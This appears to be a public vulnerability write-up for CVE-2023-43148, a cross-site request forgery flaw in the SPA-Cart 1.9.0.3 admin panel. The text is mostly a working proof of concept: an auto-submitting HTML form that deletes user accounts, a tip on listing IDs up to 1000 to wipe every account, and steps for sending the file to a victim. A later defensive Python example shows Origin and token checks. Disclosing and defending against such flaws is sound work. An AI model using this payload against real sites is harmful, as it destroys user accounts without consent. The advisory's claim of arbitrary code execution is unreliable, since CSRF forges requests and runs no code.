MinoTauro2020 / CVE-2023-43148

CVE CSRF DELETE ACCOUNT


# CVE-2023-43148
# Author: Aitor Herrero Fuentes

# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/admin
# Version: 1.9.0.3
# Tested on: Windows 10 Pro

CSRF DELETE ALL ACCOUNT

A Cross-Site Request Forgery (CSRF) vulnerability in the application demo.spa-cart.com allows a remote attacker to execute arbitrary code and delete "All Accounts" with one click.  
A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking a link or opening a file that contains malicious code. This code could then be used to delete all accounts.

POC

 1 - Create a file with this code and save it as HTML.
 Attack: delete all accounts

```html
<html>
  <body>
    <form action="https://demo.spa-cart.com/admin/users/search" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="mode" value="delete" />
      <input type="hidden" name="status&#91;855&#93;" value="1" />
      <input type="hidden" name="status&#91;848&#93;" value="1" />
      <input type="hidden" name="status&#91;857&#93;" value="1" />
      <input type="hidden" name="status&#91;859&#93;" value="1" />
      <input type="hidden" name="status&#91;852&#93;" value="1" />
      <input type="hidden" name="status&#91;850&#93;" value="0" />
      <input type="hidden" name="status&#91;849&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;858&#93;" value="on" />
      <input type="hidden" name="status&#91;858&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;856&#93;" value="on" />
      <input type="hidden" name="status&#91;856&#93;" value="1" />
      <input type="hidden" name="to&#95;delete&#91;854&#93;" value="on" />
      <input type="hidden" name="status&#91;854&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Tip: Every user is assigned one ID, for example "status[852]". Complete the HTML with "status[001]", "status[002]" and so on up to 1000; with this tip the attacker can delete all users.

2 - Example: test.html

3 - Send it to the victim.

4 - When the victim opens the HTML, the file test.html opens in their browser, and when they click the button the code makes the changes in their current session.
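
The forged POST above succeeds because the victim's session cookie alone authorizes the request. The following server-side check rejects it by validating the Origin/Referer header and a session-bound token. It is an added example, not SPA-Cart's code or part of the original PoC; the `csrf_token` field name, the key handling and all function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions, not from the advisory: key handling, the "csrf_token" field
# name and all function names are illustrative.
TRUSTED_ORIGIN = "https://demo.spa-cart.com"
SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, server-side only
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token(session_id: str) -> str:
    """Token bound to one session; rendered only into the application's own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def check_request(method, headers, form, session_id):
    """Return (allowed, reason) for a request that carries a valid session cookie."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    # Layer 1: Origin, falling back to Referer. A page opened from a local
    # file sends "Origin: null", which fails the comparison below.
    source = headers.get("Origin") or headers.get("Referer")
    if not source or origin_of(source) != TRUSTED_ORIGIN:
        return False, "cross-origin or missing Origin/Referer"
    # Layer 2: session-bound token, compared in constant time.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample mirroring two fields of the PoC form (no token present).
FORGED_FORM = {"mode": "delete", "to_delete[858]": "on"}

if __name__ == "__main__":
    sid = "constructed-session-id"
    print(check_request("POST", {"Origin": "null"}, FORGED_FORM, sid))
    valid = dict(FORGED_FORM, csrf_token=issue_token(sid))
    print(check_request("POST", {"Origin": TRUSTED_ORIGIN}, valid, sid))
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a browser-side layer on top of this check, since the cookie is then withheld from cross-site POSTs.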